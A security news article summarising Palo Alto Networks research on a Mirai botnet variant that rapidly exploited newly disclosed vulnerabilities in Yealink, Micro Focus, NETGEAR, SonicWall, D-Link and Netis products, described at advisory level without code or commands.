New Mirai Variant Leverages 10 Vulnerabilities to Hijack IoT Devices
Over the past month, a variant of the Mirai botnet was observed targeting new security vulnerabilities within hours after they had been disclosed publicly, researchers with Palo Alto Networks reveal.
Around since 2016, Mirai has had its source code leaked online, which resulted in tens of variants being released over the years, each with its own targeting capabilities.
What makes the variant tracked by Palo Alto Networks stand out in the crowd is the fact that, within a four-week timeframe, it started exploiting several vulnerabilities that have been disclosed this year.
On February 23, the Mirai variant was observed targeting CVE-2021-27561 and CVE-2021-27562, two vulnerabilities in the Yealink DM (Device Management) platform that had been disclosed the very same day.
Impacting Yealink DM version 126.96.36.199 and older, the flaws (pre-auth SSRF and command injection, respectively) exist because user-provided data is not properly filtered and could be exploited to execute arbitrary commands as root, without authentication.
On March 3, Palo Alto Networks’ security researchers noticed that the same samples were also using an exploit for CVE-2021-22502, a critical (CVSS score of 9.8) remote code execution vulnerability in Micro Focus Operations Bridge Reporter.
Exploitable without authentication, the security bug exists because a user-supplied string isn’t properly validated when the Token parameter provided to the LogonResource endpoint is handled, allowing an attacker to execute code as root.
Ten days later, on March 13, the samples also incorporated an exploit targeting CVE-2020-26919, a critical vulnerability (CVSS score 9.8) affecting NETGEAR JGS516PE business-grade gigabit switches. The bug is described as “lack of access control at the function level.”
In September 2020, Netgear published an advisory for this vulnerability, advising customers to update the firmware on their devices.
Other vulnerabilities being exploited in these attacks include a SonicWall SSL-VPN bug referred to as VisualDoor, CVE-2020-25506 (D-Link DNS-320 firewall), CVE-2020-26919 (Netgear ProSAFE Plus), and CVE-2019-19356 (Netis WF2419 wireless router). Three other security issues are also being exploited, but they haven’t been identified yet.
“The attacks are still ongoing at the time of this writing. Upon successful exploitation, the attackers try to download a malicious shell script, which contains further infection behaviors such as downloading and executing Mirai variants and brute-forcers,” Palo Alto Networks reveals.